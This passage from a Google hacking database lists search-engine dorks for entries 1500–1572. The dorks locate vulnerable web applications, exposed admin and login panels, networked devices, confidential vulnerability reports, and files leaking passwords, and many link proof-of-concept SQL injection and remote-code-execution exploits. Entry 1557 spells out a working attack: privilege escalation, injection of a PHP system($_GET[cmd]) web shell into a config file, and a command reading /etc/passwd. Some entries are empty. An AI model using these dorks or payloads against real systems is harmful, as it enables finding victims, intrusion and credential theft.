See what ports are being monitored as well as ip addresses.<br> <br> Be sure to check the google cached page first.[descr]] [[url]http://www.google.com/search?num=30&q=inurl%3Astatus.cgi%3Fhost%3Dall+-cvs[url]] [[dork]inurl:status.cgi?host=all -cvs[dork]] [end][1500]] [[start][1501] [[title]inurl:polly/CP[[title]] [[descr]You can get into the admin panel without logging in.[descr]] [[url]http://www.google.com/search?complete=1&hl=en&q=inurl%3Apolly%2FCP[url]] [[dork]inurl:polly/CP[dork]] [end][1501]] [[start][1502] [[title]"News generated by Utopia News Pro" | "Powered By: Utopia News Pro"[title]] [[descr]Utopia News Pro 1.1.3 (and prior versions) SQL Injection & XSS<br> <br> advisory & poc exploit:<br> <br> http://rgod.altervista.org/utopia113.html<br> <br> [descr]] [[url]http://www.google.com/search?q=%22News+generated+by+Utopia+News+Pro%22+%7C+%22Powered+By%3A+Utopia+News+Pro%22[url]] [[dork]"News generated by Utopia News Pro" | "Powered By: Utopia News Pro"[dork]] [end][1502]] [[start][1504] [[title]"Cyphor (Release:" -www.cynox.ch[[title]] [[descr]Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scripting<br> <br> my advisory & poc exploit:<br> <br> http://rgod.altervista.org/cyphor019.html<br> <br> rgod<br> <br> Moderator PS: The software is no longer maintained.[descr]] [[url]http://www.google.com/search?hl=en&q=%22Cyphor+%28Release%3A%22+-www.cynox.ch[url]] [[dork]"Cyphor (Release:" -www.cynox.ch[dork]] [end][1504]] [[start][1505] [[title]"Welcome to the versatileBulletinBoard" | "Powered by versatileBulletinBoard"[title]] [[descr]versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)<br> multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosure<br> <br> advisory:<br> <br> http://rgod.altervista.org/versatile100RC2.html[descr]] [[url]http://www.google.com/search?hl=en&q=%22Welcome+to+the+versatileBulletinBoard%22+%7C+%22Powered+by+versatileBulletinBoard%22[url]] [[dork]"Welcome to the 
versatileBulletinBoard" | "Powered by versatileBulletinBoard"[dork]] [end][1505]] [[start][1506] [[title]inurl:ocw_login_username[[title]] [[descr]WEBppliance is a software application designed to automate the deployment and management of Web-hosting services. <br> <br> There is a bug in how this product does the Logon validation. This Search will take you directly into the Admin pages....U can delete a User....(Plz dont do that..)<br> <br> Enjoy,<br> Night Hacker[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aocw_login_username[url]] [[dork]inurl:ocw_login_username[dork]] [end][1506]] [[start][1507] [[title]intitle:Bookmarks inurl:bookmarks.html "Bookmarks[[title]] [[descr]AFAIK the bookmarks of Firefox, Netscape and Mozilla are stored in bookmarks.html. It is often uploaded to serve as a backup, so it could reveal some juicy information.[descr]] [[url]http://www.google.com/search?q=intitle%3ABookmarks+inurl%3Abookmarks.html+%22Bookmarks+Toolbar+Folder%22+%22Add+bookmarks+to+this+folder+to+see+them+displayed+on+the+Bookmarks+Toolbar%22[url]] [[dork]intitle:Bookmarks inurl:bookmarks.html "Bookmarks Toolbar Folder" "Add bookmarks to this folder to see them displayed on the Bookmarks Toolbar"[dork]] [end][1507]] [[start][1509] [[title]"Shadow Security Scanner performed a vulnerability assessment"[title]] [[descr]This is a googledork to find vulnerability reports produced by Shadow Security Scanner. They contain valuable information which can be used to break into a system.[descr]] [[url]http://www.google.com/search?q=%22Shadow+Security+Scanner+performed+a+vulnerability+assessment%22&num=100&hl=en&lr=&filter=1[url]] [[dork]"Shadow Security Scanner performed a vulnerability assessment"[dork]] [end][1509]] [[start][1510] [[title]"The following report contains confidential information" vulnerability -search[[title]] [[descr]This googledork reveals vulnerability reports from many different vendors. 
These reports can contain information which can help an attacker break into a system/network.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22The+following+report+contains+confidential+information%22+vulnerability+-search[url]] [[dork]"The following report contains confidential information" vulnerability -search[dork]] [end][1510]] [[start][1511] [[title]intitle:"Docutek ERes - Admin Login" -edu[[title]] [[descr]Docutek Eres is software that helps libraries get an internet end to them. This dork finds the admin login page. Using Docutek Eres you can look through course material among other things.[descr]] [[url]http://www.google.com/search?q=intitle:%22Docutek+ERes+-+Admin+Login%22+-edu&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"Docutek ERes - Admin Login" -edu[dork]] [end][1511]] [[start][1512] [[title]intitle:"Retina Report" "CONFIDENTIAL INFORMATION"[title]] [[descr]This googledork finds vulnerability reports produced by eEye Retina Security Scanner. The information inside these reports can help an attacker break into a system/network.<br> [descr]] [[url]http://www.google.com/search?q=intitle:%22Retina+Report%22+%22CONFIDENTIAL+INFORMATION%22&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"Retina Report" "CONFIDENTIAL INFORMATION"[dork]] [end][1512]] [[start][1513] [[title]intitle:"CJ Link Out V1"[title]] [[descr]A cross site scripting vulnerability has been discovered in CJ linkout version 1.x. CJ linkout is a free product which allows you to easily let users connect to a different site with a frame at the top which links back to your site. 
The vulnerability report can be found at http://secunia.com/advisories/16970/ .[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22CJ+Link+Out+V1%22&btnG=Search[url]] [[dork]intitle:"CJ Link Out V1"[dork]] [end][1513]] [[start][1514] [[title]server-dbs "intitle:index of"[title]] [[descr]Yes, people actually post their teamspeak servers on websites. Just look for the words superadmin in the files and the password trails it in plain text.[descr]] [[url]http://www.google.com/search?as_q=server-dbs&num=100&hl=en&c2coff=1&btnG=Google+Search&as_epq=intitle%3Aindex+of&as_oq=&as_eq=&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images[url]] [[dork]server-dbs[dork]] [end][1514]] [[start][1516] [[title]inurl:"Sites.dat"+"PASS="[title]] [[descr]FlashFXP has the ability to import a Sites.dat file into its current Sites.dat file. Using this search query you are able to find websites misconfigured to share the flashfxp folder and subsequently the Sites.dat file containing all custom sites the victim has in their sitelist. The passwords are not clear text but if you import the sites.dat into flashfxp you can connect to the ftps and it automatically sends the password. You can also set flashfxp to not hide passwords and it will show you what the password is when it connects.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%22Sites.dat%22%2B%22PASS%3D%22&btnG=Google+Search[url]] [[dork]inurl:"Sites.dat"+"PASS="[dork]] [end][1516]] [[start][1518] [[title]("port_255/home")|(inurl:"home?port=255")[[title]] [[descr]Standard printer search. 
<br> <br> Moderator note: see also dork id=1221[descr]] [[url]http://www.google.com/search?q=(%22port_255/home%22)%7C(inurl:%22home%3Fport%3D255%22)&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]("port_255/home")|(inurl:"home?port=255")[dork]] [end][1518]] [[start][1522] [[title]"This page is for configuring Samsung Network Printer" | printerDetails.htm[[title]] [[descr]Several different Samsung printers[descr]] [[url]http://www.google.com/search?hl=en&q=%22This+page+is+for+configuring+Samsung+Network+Printer%22+%7C+printerDetails.htm[url]] [[dork]"This page is for configuring Samsung Network Printer" | printerDetails.htm[dork]] [end][1522]] [[start][1523] [[title]log inurl:linklint filetype:txt -"checking"[title]] [[descr]Linklint is an Open Source Perl program that checks links on web sites. This search finds the Linklint log directory. The complete site map can be recreated, and if you go back one directory you can see all the other files generated by linklint. Thanks to CP for direction.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=log+inurl%3Alinklint+filetype%3Atxt+-%22checking%22&btnG=Search[url]] [[dork]log inurl:linklint filetype:txt -"checking"[dork]] [end][1523]] [[start][1524] [[title]inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php[[title]] [[descr]Moodle <=1.6 blind SQL injection<br> <br> advisory & poc exploit:<br> <br> http://rgod.altervista.org/moodle16dev.html[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Acourse%2Fcategory.php+%7C+inurl%3Acourse%2Finfo.php+%7C+inurl%3Aiplookup%2Fipatlas%2Fplot.php[url]] [[dork]inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php[dork]] [end][1524]] [[start][1525] [[title]"Powered by XOOPS 2.2.3 Final"[title]] [[descr]XOOPS 2.2.3 Arbitrary local file inclusion<br> <br> This is a generic dork for the version I tested, advisory & poc exploit:<br> <br> 
http://rgod.altervista.org/xoops_xpl.html<br> [descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+XOOPS+2.2.3+Final%22[url]] [[dork]"Powered by XOOPS 2.2.3 Final"[dork]] [end][1525]] [[start][1526] [[title]inurl:"wfdownloads/viewcat.php?list="[title]] [[descr]XOOPS WF_Downloads (2.05) module SQL injection<br> <br> This is a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory & poc exploit:<br> <br> http://rgod.altervista.org/xoops_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%22wfdownloads%2Fviewcat.php%3Flist%3D%22[url]] [[dork]inurl:"wfdownloads/viewcat.php?list="[dork]] [end][1526]] [[start][1527] [[title]intitle:"OnLine Recruitment Program - Login" -johnny.ihackstuff[[title]] [[descr]This is the Employer's Interface of eRecruiter, a 100% Paper Less Recruitment Solution implemented by Universal Virtual Office. The only time you need to use paper is when you give out the appointment letter.<br> <br> The access to the Employer's Zone is restricted to authorized users only. Please authenticate your identity.[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22OnLine+Recruitment+Program+-+Login%22+-johnny.ihackstuff[url]] [[dork]intitle:"OnLine Recruitment Program - Login" -johnny.ihackstuff[dork]] [end][1527]] [[start][1528] [[title]intitle:"EXTRANET * - Identification"[title]] [[descr]WorkZone Extranet Solution login page. 
All portals are in French or Spanish, I believe.[descr]] [[url]http://www.google.com/search?q=intitle:%22EXTRANET+*+-+Identification%22+-johnny.ihackstuff&hl=en&filter=0[url]] [[dork]intitle:"EXTRANET * - Identification" -johnny.ihackstuff[dork]] [end][1528]] [[start][1529] [[title]intitle:"EXTRANET login" -.edu -.mil -.gov -johnny.ihackstuff[[title]] [[descr]This search finds many different Extranet login pages.<br> [descr]] [[url]http://www.google.com/search?q=intitle:%22EXTRANET+login%22+-.edu+-.mil+-.gov+-johnny.ihackstuff&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]intitle:"EXTRANET login" -.edu -.mil -.gov -johnny.ihackstuff[dork]] [end][1529]] [[start][1531] [[title]intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press[[title]] [[descr]HP WBEM Clients are WBEM enabled management applications that provide the user interface and functionality system administrators need to manage their environment. [descr]] [[url]http://www.google.com/search?q=intitle:%22*-+HP+WBEM+Login%22+%7C+%22You+are+being+prompted+to+provide+login+account+information+for+*%22+%7C+%22Please+provide+the+information+requested+and+press+the+OK+button+to+complete+the+login+process%22+%7C+%22%3C![url]] [[dork]intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press the OK button to complete the login process" | "<![dork]] [end][1531]] [[start][1533] [[title]intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf[[title]] [[descr]Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail, calendaring, instant messaging, task management, and contact and document management functions. 
The leading alternative to Microsoft Exchange, GroupWise has long been praised by customers and industry watchers for its security and reliability. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22Novell+Web+Services%22+%22GroupWise%22+-inurl%3A%22doc%2F11924%22+-.mil+-.edu+-.gov+-filetype%3Apdf&btnG=Search&filter=0[url]] [[dork]intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf[dork]] [end][1533]] [[start][1534] [[title]"iCONECT 4.1 :: Login"[title]] [[descr]This search finds the login page for iCONECTnxt, which enables firms to search, organize, and review electronic and document discovery information, including email, native files, and images, from anywhere in the world for easy collaboration with outside counsel, branch offices, and consultants. LAN and Web solutions available. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22iCONECT+4.1+%3A%3A+Login%22&btnG=Search[url]] [[dork]"iCONECT 4.1 :: Login"[dork]] [end][1534]] [[start][1535] [[title]"Powered by Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff[[title]] [[descr]Webmail login portals for Merak Email Server<br> <br> Merak Email Server Suite consists of the multiple award-winning Merak Email Server core and optional components:<br> <br> * Email Server for Windows or Linux<br> * Anti-Spam Protection<br> * Anti-Virus Protection<br> * Integrated WebMail Access<br> * Instant Messaging<br> * GroupWare <br> <br> [descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Powered+by+Merak+Mail+Server+Software%22+-.gov+-.mil+-.edu+-site%3Amerakmailserver.com+-johnny.ihackstuff&filter=0[url]] [[dork]"Powered by Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff[dork]] [end][1535]] [[start][1536] [[title]intitle:"Merak Mail Server Web Administration" -ihackstuff.com[[title]] [[descr]User login pages for Merak Email Server Suite which 
consists of Merak Email Server core and optional components:<br> <br> * Email Server for Windows or Linux<br> * Anti-Spam Protection<br> * Anti-Virus Protection<br> * Integrated WebMail Access<br> * Instant Messaging<br> * GroupWare<br> <br> more info: h**p://www.icewarp.com[descr]] [[url]http://www.google.com/search?q=intitle:%22Merak+Mail+Server+Web+Administration%22+-ihackstuff.com&num=100&&filter=0[url]] [[dork]intitle:"Merak Mail Server Web Administration" -ihackstuff.com[dork]] [end][1536]] [[start][1537] [[title]ext:yml database inurl:config[[title]] [[descr]Ruby on Rails is an MVC full-stack framework for development of web applications. There's a configuration file in this framework called database.yml that links Rails with the DB. It contains all the info needed to access the DB including username and password in clear text.[descr]] [[url]http://www.google.com/search?hl=en&q=ext%3Ayml+database+inurl%3Aconfig[url]] [[dork]ext:yml database inurl:config[dork]] [end][1537]] [[start][1540] [[title]"This is a restricted Access Server" "Javascript Not Enabled!"|"Messenger Express" -edu -ac[[title]] [[descr]Mostly Login Pages for iPlanet Messenger Express, which is a web-based electronic mail program that enables end users to access their mailboxes using a browser. Messenger Express clients send mail to a specialized web server that is part of iPlanet Messaging Server. 
<br> <br> Thanks to the forum members for cleaning up the search.[descr]] [[url]http://www.google.com/search?q=%22This+is+a+restricted+Access+Server%22+%22Javascript+Not+Enabled!%22%7C%22Messenger+Express%22+-edu+-ac&num=100&filter=0[url]] [[dork]"This is a restricted Access Server" "Javascript Not Enabled!"|"Messenger Express" -edu -ac[dork]] [end][1540]] [[start][1541] [[title]inurl:webvpn.html "login" "Please enter your"[title]] [[descr]The Cisco WebVPN Services Module is a high-speed, integrated Secure Sockets Layer (SSL) VPN services module for Cisco products.[descr]] [[url]http://www.google.com/search?q=inurl:webvpn.html+%22login%22+%22Please+enter+your%22&num=100&filter=0[url]] [[dork]inurl:webvpn.html "login" "Please enter your"[dork]] [end][1541]] [[start][1542] [[title]intitle:"SNOIE Intel Web Netport Manager" OR intitle:"Intel Web Netport Manager Setup/Status"[title]] [[descr]Intel Netport Express Print Server.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22SNOIE+Intel+Web+Netport+Manager%22+OR+intitle%3A%22Intel+Web+Netport+Manager+Setup%2FStatus%22[url]] [[dork]intitle:"SNOIE Intel Web Netport Manager" OR intitle:"Intel Web Netport Manager Setup/Status"[dork]] [end][1542]] [[start][1543] [[title]"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-[[title]] [[descr]iLo and related login pages !? Whoops.. 
[descr]] [[url]http://www.google.com/search?q=%22Establishing+a+secure+Integrated+Lights+Out+session+with%22+OR+intitle:%22Data+Frame+-+Browser+not+HTTP+1.1+compatible%22+OR+intitle:%22HP+Integrated+Lights-Out+Login%22+%7C+%22Alert%27+panel+is+displayed,+you+must+selec[url]] [[dork]"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-Out Login" | "Alert' panel is displayed, you must selec[dork]] [end][1543]] [[start][1544] [[title]inurl:nnls_brand.html OR inurl:nnls_nav.html[[title]] [[descr]Novell Nterprise Linux Services detection dork. Some of the features are:<br> <br> * iFolder<br> * Samba<br> * NetStorage<br> * eDirectory Administration<br> * Linux User Management<br> * NMAS 2.3<br> * NetMail 3.5<br> * GroupWise 6.5<br> * iPrint<br> * Virtual Office[descr]] [[url]http://www.google.com/search?q=inurl:nnls_brand.html+OR+inurl:nnls_nav.html&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]inurl:nnls_brand.html OR inurl:nnls_nav.html[dork]] [end][1544]] [[start][1545] [[title]intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"[title]] [[descr]An attacker may want to know about the antivirus software running. The description says he can check the status of the F-Secure Policy Manager Server's Host Module. He can also check the status of the Console Module, but only if he's reading the page from the local host.[descr]] [[url]http://www.google.com/search?q=intitle:%22Welcome+to+F-Secure+Policy+Manager+Server+Welcome+Page%22&filter=0[url]] [[dork]intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"[dork]] [end][1545]] [[start][1546] [[title]intitle:"Summit Management Interface" -georgewbush.org.uk[[title]] [[descr]Extreme Networks Summit Switches Web admin pages. 
Server: Allegro-Software-RomPager/2.10 [descr]] [[url]http://www.google.com/search?q=intitle:%22Summit+Management+Interface%22+-georgewbush.org.uk&num=50&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Summit Management Interface" -georgewbush.org.uk[dork]] [end][1546]] [[start][1547] [[title]intitle:Cisco "You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator"[title]] [[descr]Login pages for Cisco VPN Concentrator stuff[descr]] [[url]http://www.google.com/search?q=intitle:Cisco+%22You+are+using+an+old+browser+or+have+disabled+javascript.+You+must+use+version+4+or+higher+of+Netscape+Navigator/Communicator%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:Cisco "You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator"[dork]] [end][1547]] [[start][1548] [[title]intitle:"Iomega NAS Manager" -ihackstuff.com[[title]] [[descr]Login page dork for Iomega NAS Manager.. 
There's only 1 result for it now, but this could change in the future.[descr]] [[url]http://www.google.com/search?&q=intitle%3A%22Iomega+NAS+Manager%22+-ihackstuff.com&filter=0[url]] [[dork]intitle:"Iomega NAS Manager" -ihackstuff.com[dork]] [end][1548]] [[start][1549] [[title]"This website was created with phpWebThings 1.4"[title]] [[descr]http://www.google.com/search?hl=it&q=%22This+website+was+created+with+phpWebThings+1.4%22+&btnG=Cerca+con+Google&meta=<br> "This website was created with phpWebThings 1.4" <br> <br> this is the Secunia advisory:<br> http://secunia.com/advisories/17410/<br> <br> and my exploit that shows a new vulnerability in the "msg" parameter:<br> <br> http://rgod.altervista.org/phpwebth14_xpl.html[descr]] [[url]http://www.google.com/search?hl=it&q=%22This+website+was+created+with+phpWebThings+1.4%22+&btnG=Cerca+con+Google&meta=[url]] [[dork]"This website was created with phpWebThings 1.4" [dork]] [end][1549]] [[start][1550] [[title]"site info for" "Enter Admin Password"[title]] [[descr]This will take you to the cash crusader admin login screen. It is my first google hack.. 
also try adding index.php at the end, have fun people :)[descr]] [[url]http://www.google.com/search?hl=en&q=%22site+info+for%22+%22Enter+Admin+Password%22&filter=0[url]] [[dork]"site info for" "Enter Admin Password"[dork]] [end][1550]] [[start][1551] [[title]inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin[[title]] [[descr]***WARNING: This search uses google images, disable images unless you want your IP spewed across webpages!***<br> <br> Webalizer is a program that organizes who is going to a Webpage, what they are looking at, what user names are entered and endless other statistics.<br> This is a great first step in getting too much information about a website. You see any links or files that are hidden; the search can be made more specific by using other google advanced searches.<br> <br> Learn more about Webalizer (http://www.mrunix.net/webalizer/).[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1551]] [[start][1552] [[title]Display Cameras intitle:"Express6 Live Image"[title]] [[descr]Express6 live video controller.<br> Displays video from "Netlive Cameras" found in this search:<br> http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1416<br> Several new cameras found in this search.[descr]] [[url]http://www.google.com/search?q=%22Display+Cameras%22+intitle:%22Express6+Live+Image%22&hl=en&lr=&filter=0[url]] [[dork]"Display Cameras" intitle:"Express6 Live Image"[dork]] [end][1552]] [[start][1553] [[title]intitle:"Sony SNT-V304 Video Network Station" inurl:hsrindex.shtml[[title]] [[descr]The SNT-V304 Video Network Station.<br> Sony's network camera control station.[descr]] [[url]http://www.google.com/search?q=intitle:%22Sony+SNT-V304+Video+Network+Station%22+inurl:hsrindex.shtml&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"Sony SNT-V304 Video Network Station" inurl:hsrindex.shtml[dork]] [end][1553]] [[start][1554] [[title]"Copyright 2000 - 2005 Miro International Pty Ltd. 
All rights reserved" "Mambo is Free Software released"[title]] [[descr]this dork is for Mambo 4.5.2x Globals overwrite / remote command execution <br> <br> <br> exploit:<br> http://rgod.altervista.org/mambo452_xpl.html [descr]] [[url]http://www.google.com/search?hl=en&q=%22Copyright+2000+-+2005+Miro+International+Pty+Ltd.+All+rights+reserved%22+%22Mambo+is+Free+Software+released%22[url]] [[dork]"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved" "Mambo is Free Software released"[dork]] [end][1554]] [[start][1555] [[title]inurl:wp-mail.php + "There doesn't seem to be any new mail."[title]] [[descr]This is the WordPress script handling Post-By-Email functionality; the search is focussed on the message telling that there's nothing to process.<br> <br> If the script *does* have anything to process, it will reveal the email address of the account that sent the message(s).[descr]] [[url]http://www.google.com/search?q=inurl%3Awp-mail.php++%2B+%22There+doesn%27t+seem+to+be+any+new+mail.%22&btnG=Search[url]] [[dork]inurl:wp-mail.php + "There doesn't seem to be any new mail."[dork]] [end][1555]] [[start][1556] [[title]("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column, Romance, eFiction")[[title]] [[descr]eFiction <=2.0 multiple vulnerabilities<br> <br> advisory & poc exploit:<br> http://rgod.altervista.org/efiction2_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=%28%22Skin+Design+by+Amie+of+Intense%22%29%7C%28%22Fanfiction+Categories%22+%22Featured+Stories%22%29%7C%28%22default2%2C+3column%2C+Romance%2C+eFiction%22%29&filter=0[url]] [[dork]("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column, Romance, eFiction")[dork]] [end][1556]] [[start][1557] [[title]"Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)[[title]] [[descr]dork: "Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b) <br> <br> <br> this is a very old vulnerability discovered by 
Xanthic, can't find it in GHDB <br> and I am surprised at how it still works... <br> <br> register, login, go to: <br> <br> http://[target]/[path_to_upb]/admin_members.php <br> <br> edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! <br> You see Admin Panel link as I see it? <br> <br> The only link to the advisory that I found is this (in Italian): <br> <br> http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it <br> <br> <br> and I have remote commands xctn for this now, edit site title with this code: <br> <br> Ultimate PHP Board"; error_reporting(0); ini_set("max_execution_time",0); system($_GET[cmd]); echo " <br> <br> now in config.dat we have: <br> <br> ... <br> $title="Ultimate PHP Board "; error_reporting(0); ini_set("max_execution_time",0); system($_GET[cmd]); echo " "; <br> ... <br> <br> in header.php we have: <br> <br> ... <br> include "./db/config.dat"; <br> ... <br> <br> so you can launch commands: <br> <br> http://[target]/[path]/header.php?cmd=cat%20/etc/passwd[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+UPB%22+%28b+1.0%29%7C%281.0+final%29%7C%28Public+Beta+1.0b%29[url]] [[dork]"Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)[dork]] [end][1557]] [[start][1558] [[title]"powered by GuppY v4"|"Site créé avec GuppY v4"[title]] [[descr]Guppy <= 4.5.9 $REMOTE_ADDR overwrite -> remote code execution / various arbitrary inclusion issues<br> <br> advisory & poc exploit:<br> <br> http://rgod.altervista.org/guppy459_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=%22powered+by+GuppY+v4%22%7C%22Site+cr%C3%A9%C3%A9+avec+GuppY+v4%22[url]] [[dork]"powered by GuppY v4"|"Site créé avec GuppY v4"[dork]] [end][1558]] [[start][1559] [[title]"Welcome to the directory listing of" "NetworkActiv-Web-Server"[[title]] [[descr]this is for NetworkActiv-Web-Server directory listing[descr]] 
[[url]http://www.google.com/search?hl=en&q=%22Welcome+to+the+directory+listing+of%22+%22NetworkActiv-Web-Server%22&btnG=Google+Search[url]] [[dork]"Welcome to the directory listing of" "NetworkActiv-Web-Server"[dork]] [end][1559]] [[start][1560] [[title]intitle:"Snap Server" intitle:"Home" "Active Users"[title]] [[descr]This is an online device, you can search for unpassworded shares on Snap Appliance Server.<br> <br> Moderator notes:<br> This was found by golfo on sep 8th, but he forgot to submit it (ouch).. Before that mlynch was the first to discover it. See:<br> <br> http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2784&highlight=snap+server<br> http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=180<br> [descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22Snap+Server%22+intitle%3A%22Home%22+%22Active+Users%22&btnG=Google+Search[url]] [[dork]intitle:"Snap Server" intitle:"Home" "Active Users"[dork]] [end][1560]] [[start][1561] [[title]"Powered by Xaraya" "Copyright 2005"[title]] [[descr]Xaraya <=1.0.0 RC4 Denial of Service<br> <br> explanation: <br> http://rgod.altervista.org/xarayaDOS.html<br> <br> exploit:<br> http://rgod.altervista.org/xarayaDOS_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+Xaraya%22+%22Copyright+2005%22&filter=0[url]] [[dork]"Powered by Xaraya" "Copyright 2005"[dork]] [end][1561]] [[start][1562] [[title]"parent directory" +proftpdpasswd[[title]] [[descr]User names and password hashes from web server backups generated by cpanel for ProFTPd. Password hashes can be cracked, granting direct access to FTP accounts. 
Unix passwd and shadow files can sometimes be found with this query as well.[descr]] [[url]http://www.google.com/search?hl=en&q=%22parent+directory%22+%2Bproftpdpasswd&btnG=Google+Search[url]] [[dork]"parent directory" +proftpdpasswd[dork]] [end][1562]] [[start][1563] [[title]"This website powered by PHPX" -demo[[title]] [[descr]this is the dork for PhpX <= 3.5.9 SQL injection /login bypass vulnerability<br> <br> advisory & poc exploit: <br> http://rgod.altervista.org/phpx_359_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=%22This+website+powered+by+PHPX%22+-demo[url]] [[dork]"This website powered by PHPX" -demo[dork]] [end][1563]] [[start][1564] [[title]"Warning: Installation directory exists at" "Powered by Zen Cart" -demo[[title]] [[descr]by this dork you can find fresh installations of Zen-Cart<br> <br> see Full Disclosure forums for details... ;)[descr]] [[url]http://www.google.com/search?hl=en&q=%22Warning%3A+Installation+directory+exists+at%22+%22Powered+by+Zen+Cart%22+-demo[url]] [[dork]"Warning: Installation directory exists at" "Powered by Zen Cart" -demo[dork]] [end][1564]] [[start][1566] [[title]"Based on DoceboLMS 2.0"[title]] [[descr]advisory & poc exploit:<br> <br> http://rgod.altervista.org/docebo204_xpl.html[descr]] [[url]http://www.google.com/search?q=%22Based+on+DoceboLMS+2.0%22&hl=en&lr=&start=50&sa=N[url]] [[dork]"Based on DoceboLMS 2.0"[dork]] [end][1566]] [[start][1567] [[title]"2005 SugarCRM Inc. All Rights Reserved" "Powered By SugarCRM"[title]] [[descr]this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit:<br> <br> http://rgod.altervista.org/sugar_suite_40beta.html[descr]] [[url]http://www.google.com/search?hl=en&q=%222005+SugarCRM+Inc.+All+Rights+Reserved%22+%22Powered+By+SugarCRM%22[url]] [[dork]"2005 SugarCRM Inc. 
All Rights Reserved" "Powered By SugarCRM"[dork]] [end][1567]] [[start][1568] [[title]inurl:Printers/ipp_0001.asp[[title]] [[descr]Thanks to Windows 2003 Remote Printing[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3APrinters%2Fipp_0001.asp[url]] [[dork]inurl:Printers/ipp_0001.asp[dork]] [end][1568]] [[start][1569] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1569]] [[start][1570] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1570]] [[start][1571] [[title]"Powered By phpCOIN 1.2.2"[title]] [[descr]PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure<br> <br> advisory:<br> http://rgod.altervista.org/phpcoin122.html<br> <br> more generic:<br> <br> "Powered By phpCOIN"<br> to see previous versions (not tested) [descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+By+phpCOIN+1.2.2%22[url]] [[dork]"Powered By phpCOIN 1.2.2"[dork]] [end][1571]] [[start][1572] [[title]intext:"Powered by SimpleBBS v1.1"*[[title]] [[descr]Vulnerability Description<br> <br> SimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. 
